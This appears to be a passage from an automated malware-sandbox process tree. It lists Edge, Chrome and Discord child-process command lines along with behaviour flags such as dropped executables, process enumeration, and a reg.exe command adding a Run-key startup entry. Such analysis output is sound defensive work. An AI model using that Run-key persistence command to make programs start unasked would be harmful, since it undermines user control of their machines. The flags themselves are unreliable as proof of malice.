C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5112 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5032 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5264 /prefetch:87⤵
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=764 /prefetch:26⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --enable-sandbox --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --enable-sandbox --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --enable-sandbox --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --enable-sandbox --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1592 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --enable-sandbox --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --enable-sandbox --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord /d "C:\Users\Admin\AppData\Local\Discord\Update.exe --processStart Discord.exe" /f6⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2488 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6412 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6156 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2356 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1548 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6340 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=812 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6400 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5428 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6580 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4828 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3028 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=908 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6356 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5744 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6716 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3636 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3212 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6236 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3636 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4972 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6824 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6972 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6788 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6936 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7744 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7512 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7072 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7876 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7480 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7932 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7864 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8112 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7856 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7852 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7764 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8072 /prefetch:83⤵
-
-
